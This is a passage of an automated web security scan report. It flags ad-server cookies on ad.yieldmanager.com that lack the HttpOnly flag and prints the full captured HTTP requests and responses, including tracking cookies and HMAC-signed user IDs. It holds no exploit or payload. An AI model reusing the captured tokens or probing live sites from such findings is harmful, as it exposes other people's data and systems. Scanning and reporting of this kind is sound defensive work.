#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f8^!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: vuday1=BgvR*4M6Eq!79C8M#n45; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!,Y+@!$[S0!2reF!''w-!!!!$!?5%!'jyc4!i=9S!!J0T!(>n0~~~~~~=3]gE=3gdJM.jTN!#101!,Y+@!$XwL!1n,b!#t3o~!!ZH)'jyc6!w1K*!!J0T!$!$U!$]7n~~~~~=3]ih~~!$?74!!E)(!$Xwe!4ZV5!'@G9!!!!$!?5%!$To(.!wVd.!%4=*!$#x5!(^vn~~~~~=3f8^=4'1X!!!#G"; path=/; expires=Thu, 05-Sep-2013 12:44:52 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=0437c6f8-d886-11e0-ae4a-78e7d15f7c8c&_hmacv=1&_salt=1842979857&_keyid=k1&_hmac=a0feea0b76b539d7f6f3647d41d7513f336eb436; path=/; expires=Thu, 06-Oct-2011 12:44:52 GMT
Set-Cookie: lifb=M5Jkn#DZT*WZK^n; path=/; expires=Tue, 06-Sep-2011 16:44:52 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:44:52 GMT
Pragma: no-cache
Content-Length: 1242
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10834543);}
</script><script type="t
...[SNIP]...

10.24. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt&Z=160x600&cb=1315313397132599&p=1&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15lgjuenn%2FM%3D787833%2E14485914%2E14323757%2E1471092%2FD%3Dshp%2FS%3D14489115%3ASKY%2FY%3DYAHOO%2FEXP%3D1315320597%2FL%3D7PbqlWKJlBXpARpjTl%2EwjQaFMhd7ak5mFvUAAQwt%2FB%3D%2ENOIQtBDRrc%2D%2FJ%3D1315313397132599%2FK%3DiwgPsw1Pz1yP%5Ftp9hGoa9Q%2FA%3D6284739%2FR%3D0%2F%2A%24&S=14485914&i=140497&D=zip%3D%26ycg%3D%26yyob%3D&_salt=576427757&B=10&u=http%3A%2F%2Fshopping.yahoo.com%2Fsearch%3B_ylt%3DApMQLGDYOT7QlJIA.L4LcHMEgFoB%3Fp%3Dxss%2Bphone%26did%3D0&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt&ad_type=iframe&ad_size=160x600&site=140497&section_code=14485914&cb=1315313397132599&promote_sizes=1&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15lgjuenn/M=787833.14485914.14323757.1471092/D=shp/S=14489115:SKY/Y=YAHOO/EXP=1315320597/L=7PbqlWKJlBXpARpjTl.wjQaFMhd7ak5mFvUAAQwt/B=.NOIQtBDRrc-/J=1315313397132599/K=iwgPsw1Pz1yP_tp9hGoa9Q/A=6284739/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!
$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; liday1=fh'jT*YKlx8SkUrhG%Lm!79C8>U9f4; pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'<Lw!#a.3!!QB($To(0!i=9S!!28s!(Y#b~~~~~~=3f<'=3p8,M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q"; ih="b!!!!0!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1-bB!!!!#=3f:x!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r#BKZI(BgvR/4M6EqoyOxB!!w[/!79C8jX5>i; lifb=0EA2)A9.-BBcN3V%T!GP!6-Nb'W00AM5Jkn/>M1MrX6Q3; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:04 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: liday1=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0014.rm.sp2
Set-Cookie: ih="b!!!!0!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!1-bB!!!!$=3f=A!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:50:04 GMT
Set-Cookie: vuday1=@n$r#BKZI*BgvR/4M6EqoyOxB!!w[/!79C8On#BA; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: uid=uid=bdffc64e-d886-11e0-a9a3-78e7d15f4cd0&_hmacv=1&_salt=101852862&_keyid=k1&_hmac=9fdc06cf2a43915443ff1f0c6cebd54b7ca38a78; path=/; expires=Thu, 06-Oct-2011 12:50:04 GMT
Set-Cookie: liday1=:%F($!79C883G_v; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:50:04 GMT
Pragma: no-cache
Content-Length: 986
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGlUV2TmjAU.TOdPrSWGBIIWSbTibKiKAp-VPFlJwILaJQobKn768uq7fS95yHnZM69yZx7IbItE5NXgQ2LppBaeGdDpKM0prHYmZ2ubdsIIsNCpmGZnbW5cvh
...[SNIP]...

10.25. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs&Z=728x90&cb=1315313286070877&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15g5hl7jk%2FM%3D787833%2E14486128%2E14323954%2E17%2FD%3Dfin%2FS%3D2142000625%3AN%2FY%3DYAHOO%2FEXP%3D1315320486%2FL%3DDzb%2EVEPDkjnpARpjTl%2EwjQBoMhd7ak5mFoUADygs%2FB%3DpNrGPtGDJHI%2D%2FJ%3D1315313286070877%2FK%3DURqeTfr3zDD1947mBh5eOA%2FA%3D6284681%2FR%3D0%2F%2A%24&S=14486128&i=140440&D=zip%3D%26ycg%3D%26yyob%3D&_salt=2141557690&B=10&u=http%3A%2F%2Ffinance.yahoo.com%2Flookup%3Fs%3Dxss&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs&ad_type=iframe&ad_size=728x90&site=140440&section_code=14486128&cb=1315313286070877&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15g5hl7jk/M=787833.14486128.14323954.17/D=fin/S=2142000625:N/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=pNrGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=6284681/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; ih="b!!!!-!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!79C8fF3yy; pv1="b!!!!'!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G"; liday1=fh'jT*YKlx8SkUr!79C8jru9X; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(
aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0013.rm.sp2
Set-Cookie: ih="b!!!!.!,`ch!!!!#=3]gD!.`.U!!!!#=3H3k!1n,b!!!!(=3f9K!2(Qv!!!!#=3^]V!2reF!!!!$=3f8u!38Yq!!!!#=3f8`!3Eo4!!!!#=3f.'!43C%!!!!$=3f:w!4A]Y!!!!#=3f8q!4ZV4!!!!#=3f9)!4ZV5!!!!#=3f8^"; path=/; expires=Thu, 05-Sep-2013 12:48:08 GMT
Set-Cookie: vuday1=@n$r!BKZI(BgvR-4M6EqoyOxB!!w[/!79C8S3FdY; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Set-Cookie: pv1="b!!!!(!!`5!!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]gD=7pQN~!!qrZ!!E)(!$[Rn!2reF!'%o=!#:m/!#Ds0$To(/!i=9S!!28s!(=Q)~~~~~~=3f8u=3p6!M.jTN!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!!E(y!$Xwo!4ZV4!'@G9!!!!$!?5%!$To(.!w1K*!%4=!!$#x<!(^vn~~~~~=3f9)=4'2#!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!H<'~$To(/!wVd.!%4<v!#3oe!(O'k~~~~~=3f:w=7y%*!!!%Q"; path=/; expires=Thu, 05-Sep-2013 12:48:08 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=fh'jT*YKlx8SkUrhG%Ln!79C8FW*c%; path=/; expires=Wed, 07-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 12:48:08 GMT
Pragma: no-cache
Content-Length: 934
Content-Type: application/x-javascript
Age: 1
Proxy-Connection: close

document.write('<a target=\"_blank\" href=\"http://ads.bluelithium.com/clk?3,eAGVUclym0AQ.ZmcUgqzwoxMTblGGowgLELGdtANEAKzCCLkkq2vNxU5dq7pQ.frrt5eNyKmQbIdS2GazfeU6YybiGBS5BySdD-Dpmkac4wp0SmfSdlIGRShHS0
...[SNIP]...

10.26. http://ad.yieldmanager.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /imp?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&Z=300x100&cb=1315313288506222&x=http%3A%2F%2Fglobal%2Eard%2Eyahoo%2Ecom%2FSIG%3D15qi08f92%2FM%3D787833%2E14800347%2E14555521%2E14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F%5Fylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl%2EwjQMmMhd7ak5mFogABMWA%2FB%3D0tSRQtBDRmU%2D%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6454134%2FR%3D0%2F%2A%24&S=14800347&i=140509&ycg=&yyob=&zip=&_salt=1959032721&B=10&u=http%3A%2F%2Fsports.yahoo.com%2F&r=0 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/st?_PVID=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA&ad_type=iframe&ad_size=300x100&site=140509&section_code=14800347&cb=1315313288506222&zip=&ycg=&yyob=&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15qi08f92/M=787833.14800347.14555521.14177427/D=sports/S=25664825:MREC/_ylt=AjV6qkbscsOrHRx5YKOYi005nYcB/Y=YAHOO/EXP=1315320488/L=sXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA/B=0tSRQtBDRmU-/J=1315313288506222/K=Y8q4t3xfDwCLgDPxHMEVwQ/A=6454134/R=0/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; lifb=0EA2)A9.-BM5Jkn/>M1M.hWHO; bh="b!!!#N!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!#=3f9$!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$